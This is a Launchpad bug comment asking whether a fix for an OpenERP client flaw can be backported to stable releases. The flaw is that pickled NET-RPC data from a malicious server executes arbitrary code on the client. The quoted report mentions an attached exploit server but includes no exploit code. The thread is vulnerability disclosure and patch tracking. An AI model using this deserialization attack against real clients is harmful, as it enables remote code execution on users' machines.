Comment 14 for bug 671926
Revision history for this message
| Eduard Carreras i Nadal (ecarreras) wrote Re: [Bug 671926] Re: NET-RPC client-side stack should sanitize pickled data | #14 |
© 2004
Canonical Ltd.
•
Terms of use
•
Data privacy
•
Contact Launchpad Support
•
Blog
•
Careers
•
System status
•
9199653
demo site
(Get the code!)
Hi,
as a security fix can be aplied to stable clients too? 5.0.X and 6.X
Thanks
--
Eduard Carreras i Nadal
On 04/07/2011, at 7:46, "Naresh\(OpenERP\)" <email address hidden> wrote:
> Hello,
>
> Thanks for reporting !
>
> It has been fixed at lp:~openerp-dev/openobject-client/trunk-
> bug-671926-nch and will be merged soon to the trunk client.
>
>
> Thanks !
>
> ** Changed in: openobject-client
> Status: In Progress => Fix Committed
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https:/
>
> Title:
> NET-RPC client-side stack should sanitize pickled data
>
> Status in OpenERP GTK Client:
> Fix Committed
> Status in OpenERP GTK Client 5.0 series:
> Confirmed
> Status in OpenERP Web Client:
> Confirmed
> Status in OpenERP Web Client 5.0 series:
> Confirmed
>
> Bug description:
> It's possible to execute arbritrary code on client using net-rpc
> (pickle protocol) see http://
>
> If you use the client to connect to some demo server and this demo
> server is malicious, it can send malicious code which is executed in
> client side.
>
> I attach a exploit server who sends code to execute to client. Run a
> ls -l and redirect the output to proof_of_
>
> This bug was fixed in the server, but not in the client.
> Affects versions 4.2, 5.X and 6.X
>
> To manage notifications about this bug go to:
> https:/